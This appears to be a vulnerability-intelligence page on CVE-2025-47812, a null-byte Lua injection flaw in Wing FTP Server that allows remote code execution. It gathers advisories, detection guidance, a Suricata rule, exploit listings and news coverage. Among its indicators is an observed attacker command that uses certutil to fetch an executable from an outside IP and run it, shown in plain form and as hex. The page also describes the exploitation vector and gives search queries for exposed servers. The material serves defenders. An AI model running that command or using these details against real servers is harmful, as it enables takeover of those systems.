CVE-2025-47812
published 2025-07-10CVE-2025-47812: In Wing FTP Server before 7.4.4. the user and admin web interfaces mishandle '\0' bytes, ultimately allowing injection of arbitrary Lua code into user session…
PriorityP1100critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2025-08-04
Exploited in the wild
EPSS
95.34%
99.9th percentile
In Wing FTP Server before 7.4.4. the user and admin web interfaces mishandle '\0' bytes, ultimately allowing injection of arbitrary Lua code into user session files. This can be used to execute arbitrary system commands with the privileges of the FTP service (root or SYSTEM by default). This is thus a remote code execution vulnerability that guarantees a total server compromise. This is also exploitable via anonymous FTP accounts.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wftpserver | wing_ftp_server | < 7.4.4 | 7.4.4 |
| wftpserver | wing_ftp_server | <= 7.4.4 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandcertutil -urlcache -f http://185.196.9.225:8080/EOp45eWLSp5G5Uwp_yOCiQ %TEMP%\mvveiWJHx.exe & start /B %TEMP%\mvveiWJHx.exe↗
bytes↗
636572747574696c202d75726c6361636865202d6620687474703a2f2f3138352e3139362e392e3232353a383038302f454f70343565574c53703547355577705f794f436951202554454d50255c6d76766569574a48782e6578652026207374617274202f42202554454d50255c6d76766569574a48782e657865
- →Hunt for anomalously large .lua session files in the Wing FTP session directory (C:\Program Files (x86)\Wing FTP Server\session); normal session files are small, inflated sizes indicate injected Lua payload. ↗
- →Session .lua files containing 'local function hx(s)' or 'io.popen(cmd)' patterns indicate active Lua code injection exploitation of CVE-2025-47812. ↗
- →Monitor POST requests to /loginok.html containing %00 (null byte) in the username parameter as the primary exploitation vector. ↗
- →Alert on child processes spawned by WFTPServer.exe executing cmd.exe with reconnaissance commands (ipconfig, whoami, arp -a, net user) as post-exploitation indicators. ↗
- →For CVE-2025-47813 (chained with CVE-2025-47812), detect POST requests to /loginok.html with an overlong UID cookie (2048+ bytes) that trigger error responses disclosing the server filesystem path. ↗
- →Use Shodan/FOFA queries to identify exposed Wing FTP Server instances: http.html_hash:2121146066, http.favicon.hash:963565804, title:"Wing FTP Server", or Server header "Wing FTP Server". ↗
- →Session object files are named with exactly 64 hexadecimal characters and a .lua extension; new files appearing in the session directory during/after suspicious login attempts warrant immediate review. ↗
- ·Anonymous login enabled on Wing FTP Server significantly lowers the exploitation bar — attackers can inject Lua without any credentials when anonymous access is permitted. ↗
- ·CVE-2025-47811 (Wing FTP running as root/SYSTEM with no privilege drop) was deemed unimportant by the vendor and remains unpatched even in v7.4.4, meaning any RCE via CVE-2025-47812 automatically yields highest-privilege execution. ↗
- ·The second trigger request (to deserialize the malicious session) can be any valid Wing FTP web endpoint, not just dir.html — defenders should not rely solely on monitoring dir.html requests. ↗
- ·Wing FTP log entries truncate the attacker's IP address during exploitation due to the null-byte; the IP is only recoverable from the session .lua files themselves, not the domain logs. ↗
CVSS provenance
nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vulncheck10.0CRITICAL
cisa10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Wing FTP Server Improper Neutralization of Null Byte or NUL Character Vulnerability
cisa·2025-07-14·CVSS 10.0
CVE-2025-47812 [CRITICAL] CWE-158 Wing FTP Server Improper Neutralization of Null Byte or NUL Character Vulnerability
Vulnerability: Wing FTP Server Improper Neutralization of Null Byte or NUL Character Vulnerability
Affected: Wing FTP Server Wing FTP Server
Wing FTP Server contains an improper neutralization of null byte or NUL character vulnerability that can allow injection of arbitrary Lua code into user session files. This can be used to execute arbitrary system commands with the privileges of the FTP service (root or SYSTEM by default).
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://www.wftpserver.com/serverhistory.htm ; https://nvd.nist.gov/vuln/detail/CVE-2025-47812
Remediation Due Date: 2025-08-04
GHSA
GHSA-j4xf-75rr-vvrv: In Wing FTP Server before 7
ghsa_unreviewed·2025-07-10
CVE-2025-47812 [CRITICAL] CWE-158 GHSA-j4xf-75rr-vvrv: In Wing FTP Server before 7
In Wing FTP Server before 7.4.4. the user and admin web interfaces mishandle '\0' bytes, ultimately allowing injection of arbitrary Lua code into user session files. This can be used to execute arbitrary system commands with the privileges of the FTP service (root or SYSTEM by default). This is thus a remote code execution vulnerability that guarantees a total server compromise. This is also exploitable via anonymous FTP accounts.
GHSA
GHSA-r7h5-5g56-gv3h: In Wing FTP Server through 7
ghsa_unreviewed·2025-07-10·CVSS 10.0
CVE-2025-47811 [CRITICAL] CWE-267 GHSA-r7h5-5g56-gv3h: In Wing FTP Server through 7
In Wing FTP Server through 7.4.4, the administrative web interface (listening by default on port 5466) runs as root or SYSTEM by default. The web application itself offers several legitimate ways to execute arbitrary system commands (i.e., through the web console or the task scheduler), and they are automatically executed in the highest possible privilege context. Because administrative users of the web interface are not necessarily also system administrators, one might argue that this is a privilege escalation. (If a privileged application role is not available to an attacker, CVE-2025-47812 can be leveraged.) NOTE: the vendor reportedly considers this behavior "fine to keep."
VulnCheck
Wing FTP Server Improper Neutralization of Null Byte or NUL Character Vulnerability
vulncheck·2025·CVSS 10.0
CVE-2025-47812 [CRITICAL] CWE-158 Wing FTP Server Improper Neutralization of Null Byte or NUL Character Vulnerability
Wing FTP Server Improper Neutralization of Null Byte or NUL Character Vulnerability
Wing FTP Server contains an improper neutralization of null byte or NUL character vulnerability that can allow injection of arbitrary Lua code into user session files. This can be used to execute arbitrary system commands with the privileges of the FTP service (root or SYSTEM by default).
Affected: Wing FTP Server Wing FTP Server
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.huntress.com/blog/wing-ftp-server-remote-code-execution-cve-2025-47812-exploited-in-wild; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/m
Suricata
ET WEB_SPECIFIC_APPS Wing FTP Server NULL-byte Authentication Bypass (CVE-2025-47812)
suricata·2025-07-07·CVSS 10.0
CVE-2025-47812 [CRITICAL] ET WEB_SPECIFIC_APPS Wing FTP Server NULL-byte Authentication Bypass (CVE-2025-47812)
ET WEB_SPECIFIC_APPS Wing FTP Server NULL-byte Authentication Bypass (CVE-2025-47812)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Wing FTP Server NULL-byte Authentication Bypass (CVE-2025-47812)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/loginok.html"; fast_pattern; http.referer; content:"|2f|login.html"; http.request_body; content:"username|3d|"; pcre:"/^[^\x26]*?(?:\x00|\x2500)/R"; reference:url,www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/; reference:cve,2025-47812; classtype:web-application-attack; sid:2063316; rev:1; metadata:attack_target Server, created_at 2025_07_07, cve CVE_2025_47812, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag C
Exploit-DB
Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
exploitdb·2025-07-02·CVSS 10.0
CVE-2025-47812 [CRITICAL] Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
---
# Exploit Title: Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
# CVE: CVE-2025-47812
# Date: 2025-06-30
# Exploit Author: Sheikh Mohammad Hasan aka 4m3rr0r (https://github.com/4m3rr0r)
# Vendor Homepage: https://www.wftpserver.com/
# Version: Wing FTP Server <= 7.4.3
# Tested on: Linux (Root Privileges), Windows (SYSTEM Privileges)
# Description:
# Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE)
# flaw (CVE-2025-47812). This vulnerability arises from improper handling of NULL bytes in the 'username'
# parameter during login, leading to Lua code injection into session files. These maliciously crafted
# session files are subsequently execut
Nuclei
Wing FTP Server <= 7.4.3 - Path Disclosure via Overlong UID Cookie
nuclei·CVSS 10.0
CVE-2025-47813 [CRITICAL] Wing FTP Server <= 7.4.3 - Path Disclosure via Overlong UID Cookie
Wing FTP Server <= 7.4.3 - Path Disclosure via Overlong UID Cookie
Wing FTP Server versions prior to 7.4.4 are vulnerable to an authenticated information disclosure vulnerability (CVE-2025-47813).
The vulnerability occurs due to improper validation of the 'UID' session cookie in the /loginok.html endpoint. Supplying an
overlong UID value causes the server to respond with an error that includes the full local filesystem path. This can aid in further
exploitation (e.g., CVE-2025-47812) by revealing the application’s file system layout.
Template:
id: CVE-2025-47813
info:
name: Wing FTP Server <= 7.4.3 - Path Disclosure via Overlong UID Cookie
author: rcesecurity,pdteam
severity: medium
description: |
Wing FTP Server versions prior to 7.4.4 are vulnerable to an authenticated information di
Metasploit
Wing FTP Server NULL-byte Authentication Bypass (CVE-2025-47812)
metasploit·CVSS 10.0
CVE-2025-47812 [CRITICAL] Wing FTP Server NULL-byte Authentication Bypass (CVE-2025-47812)
Wing FTP Server NULL-byte Authentication Bypass (CVE-2025-47812)
Wing FTP Server allows arbitrary Lua code injection via a NULL-byte (%00) truncation bug (CVE-2025-47812). Supplying %00 as the username makes the C++ authentication routine validate only the prefix, while the full string is written unfiltered into the session file and later executed with root/SYSTEM privileges, leading to Remote Code Execution.
Nuclei
Wing FTP Server <= 7.4.3 - Remote Code Execution
nuclei·CVSS 10.0
CVE-2025-47812 [CRITICAL] Wing FTP Server <= 7.4.3 - Remote Code Execution
Wing FTP Server <= 7.4.3 - Remote Code Execution
Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE) flaw (CVE-2025-47812).
The vulnerability arises from improper NULL byte handling in the 'username' parameter during login, which allows Lua code injection
into session files. These injected session files are executed when accessing authenticated endpoints such as /dir.html, resulting
in arbitrary command execution with elevated privileges. This attack is possible only when anonymous login is enabled on the server.
Template:
id: CVE-2025-47812
info:
name: Wing FTP Server <= 7.4.3 - Remote Code Execution
author: rcesecurity,4m3rr0r
severity: critical
description: |
Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthentic
Metasploit
Wing FTP Server Authenticated Command Execution
metasploit
Wing FTP Server Authenticated Command Execution
Wing FTP Server Authenticated Command Execution
This module exploits the embedded Lua interpreter in the admin web interface for versions 3.0.0 and above. When supplying a specially crafted HTTP POST request an attacker can use os.execute() to execute arbitrary system commands on the target with SYSTEM privileges.
Bleepingcomputer
CISA flags Wing FTP Server flaw as actively exploited in attacks
blogs_bleepingcomputer·2026-03-16·CVSS 3.4
[LOW] CISA flags Wing FTP Server flaw as actively exploited in attacks
## CISA flags Wing FTP Server flaw as actively exploited in attacks
## Sergiu Gatlan
CISA warned U.S. government agencies to secure their Wing FTP Server instances against an actively exploited vulnerability that may be chained in remote code execution attacks.
Wing FTP Server is a cross-platform FTP server software that also provides secure file transfer via its built-in SFTP and web servers. The developers claim that their file transfer software is used by more than 10,000 customers worldwide, including the U.S. Air Force, Sony, Airbus, Reuters, and Sephora.
Tracked as CVE-2025-47813 , the security flaw allows threat actors with low privileges to discover the full local installation path of the application on unpatched servers.
"Wing FTP Server contains a generation of error message
Bleepingcomputer
Hackers are exploiting critical RCE flaw in Wing FTP Server
blogs_bleepingcomputer·2025-07-12·CVSS 3.4
CVE-2025-47812 [LOW] Hackers are exploiting critical RCE flaw in Wing FTP Server
## Hackers are exploiting critical RCE flaw in Wing FTP Server
## Bill Toulas
Hackers have started to exploit a critical remote code execution vulnerability in Wing FTP Server just one day after technical details on the flaw became public.
The observed attack ran multiple enumeration and reconnaissance commands followed by establishing persistence by creating new users.
The exploited Wing FTP Server vulnerability is tracked as CVE-2025-47812 and received the highest severity score. It is a combination of a null byte and Lua code injection that allows remote a unauthenticated attacker to execute code with the highest privileges on the system (root/SYSTEM).
Wing FTP Server is a powerful solution for managing secure file transfers that can execute Lua scripts, which is widely used in ent
Huntress
Wing FTP Server Remote Code Execution (CVE-2025-47812) Exploited in the Wild
blogs_huntress·2025-07-10·CVSS 10.0
CVE-2025-47812 [CRITICAL] Wing FTP Server Remote Code Execution (CVE-2025-47812) Exploited in the Wild
## Summary
TL;DR : Huntress saw active exploitation of Wing FTP Server remote code execution (CVE-2025-47812) on a customer on July 1, 2025. Organizations running Wing FTP Server should update to the fixed version, version 7.4.4, as soon as possible.
CVE-2025-47812 is a null byte and Lua injection flaw that can lead to root/SYSTEM-level remote code execution if exploited. The vulnerability was first publicly disclosed on June 30 by Julien Ahrens in versions prior to 7.4.4 of the Wing FTP Server, its file transfer protocol software for Windows, Linux, and macOS.
At a high level, CVE-2025-47812 stems from how null bytes are handled in the username parameter (specifically related to the loginok.html file, which handles the authentication process). This can allow remote attackers to perform
Huntress
Wing FTP Server Remote Code Execution (CVE-2025-47812) Exploited in the Wild | Huntress
blogs_huntress·CVSS 10.0
CVE-2025-47812 [CRITICAL] Wing FTP Server Remote Code Execution (CVE-2025-47812) Exploited in the Wild | Huntress
## Summary
TL;DR: Huntress saw active exploitation of Wing FTP Server remote code execution (CVE-2025-47812) on a customer on July 1, 2025. Organizations running Wing FTP Server should update to the fixed version, version 7.4.4, as soon as possible.
CVE-2025-47812 is a null byte and Lua injection flaw that can lead to root/SYSTEM-level remote code execution if exploited. The vulnerability was first publicly disclosed on June 30 by Julien Ahrens in versions prior to 7.4.4 of the Wing FTP Server, its file transfer protocol software for Windows, Linux, and macOS.
At a high level, CVE-2025-47812 stems from how null bytes are handled in the username parameter (specifically related to the loginok.html file, which handles the authentication process). This can allow remote attackers to perform
Greynoiseio
NoiseLetter July 2025
blogs_greynoiseio
NoiseLetter July 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/https://www.vicarius.io/vsociety/posts/cve-2025-47812-detection-script-remote-code-execution-vulnerability-in-wing-ftp-serverhttps://www.vicarius.io/vsociety/posts/cve-2025-47812-mitigation-script-remote-code-execution-vulnerability-in-wing-ftp-serverhttps://www.wftpserver.comhttps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-47812https://www.huntress.com/blog/wing-ftp-server-remote-code-execution-cve-2025-47812-exploited-in-wild
2025-07-10
Published
2025-07-14
Added to CISA KEV
Exploited in the wild